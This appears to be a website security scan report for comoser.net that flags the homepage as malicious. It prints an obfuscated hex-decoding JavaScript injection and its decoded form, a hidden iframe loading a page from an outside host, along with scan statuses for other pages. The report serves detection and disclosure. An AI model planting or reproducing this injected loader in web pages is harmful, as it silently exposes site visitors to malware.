Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=comoser.net
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://comoser.net/ | 200 OK Content-Length: 2794 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
function v4ad7ad4255fa3(v4ad7ad4255fb3){ function v4ad7ad4255fc6 () {return 16;} return(parseInt(v4ad7ad4255fb3,v4ad7ad4255fc6()));}function v4ad7ad425600d(v4ad7ad425601b){ function v4ad7ad425606f () {var v4ad7ad425607d=2; return v4ad7ad425607d;} var v4ad7ad4256029='';for(v4ad7ad425605e=0; v4ad7ad425605e<v4ad7ad425601b.length; v4ad7ad425605e+=v4ad7ad425606f()){ v4ad7ad4256029+=(String.fromCharCode(v4ad7ad4255fa3(v4ad7ad425601b.substr(v4ad7ad425605e, v4ad7ad425606f()))));}return v4ad7ad4256029;} document.write(v4ad7ad425600d('3C696672616D65206E616D653D27363432396232356527207372633D27687474703A2F2F63312E74657374696E676E65777A7A7A2E636F6D2F696E6465782E706870272077696474683D343935206865696768743D323930207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));
Decoded script:
<iframe name='6429b25e' src='http://c1.testingnewzzz.com/index.php' width=495 height=290 style='display:none'></iframe>
Antivirus reports:
http://comoser.net/guestbook/guestbook.html | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://comoser.net/test404page.js | 404 Not Found Content-Length: 275 Content-Type: text/html | clean |
http://comoser.net/cgi-bin/openwebmail/openwebmail.pl | 200 OK Content-Length: 5772 Content-Type: text/html | clean |
http://comoser.net/openwebmail/openwebmail.html | 200 OK Content-Length: 74404 Content-Type: text/html | clean |
http://comoser.net/openwebmail/ | 200 OK Content-Length: 74404 Content-Type: text/html | clean |
http://comoser.net/openwebmail/doc/readme.txt | 200 OK Content-Length: 51409 Content-Type: text/plain | clean |
http://you_server_domainname/cgi-bin/openwebmail/userstat.pl | 500 Can't connect to you_server_domainname:80 Content-Length: 196 Content-Type: text/plain | clean |
http://you_server_domainname/cgi-bin/openwebmail/userstat.pl?playsound=1 | 500 Can't connect to you_server_domainname:80 Content-Length: 196 Content-Type: text/plain | clean |
http://comoser.net/openwebmail/doc/changes.txt | 200 OK Content-Length: 39803 Content-Type: text/plain | clean |
http://comoser.net/openwebmail/doc/files.txt | 200 OK Content-Length: 5877 Content-Type: text/plain | clean |
http://comoser.net/openwebmail/doc/faq.txt | HTTP/1.1 200 OK Connection: close Date: Fri, 23 Jan 2015 11:02:42 GMT Accept-Ranges: bytes ETag: "97f8c00-12b8a-65cee780" Server: Apache Content-Length: 76682 Content-Type: text/plain; charset=UTF-8 Last-Modified: Tue, 01 Feb 2005 06:39:42 GMT | clean |
http://your_server/cgi-bin/openwebmail/openwebmail.pl | 500 Can't connect to your_server:80 Content-Length: 186 Content-Type: text/plain | clean |
http://comoser.net/openwebmail/doc/copyright.txt | 200 OK Content-Length: 17978 Content-Type: text/plain | clean |
http://comoser.net/openwebmail/help/en/index.html | 200 OK Content-Length: 6135 Content-Type: text/html | clean |
http://comoser.net/openwebmail/help/en/templates_and_data/makewin.js | 200 OK Content-Length: 73 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: comoser.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 23 Jan 2015 11:02:34 GMT
Accept-Ranges: bytes
Server: Apache
Content-Type: text/html; charset=UTF-8
Second query (visit from search engine):
GET / HTTP/1.1
Host: comoser.net
Referer: http://www.google.com/search?q=comoser.net
Result:
The result is similar to the first query. There are no suspicious redirects found.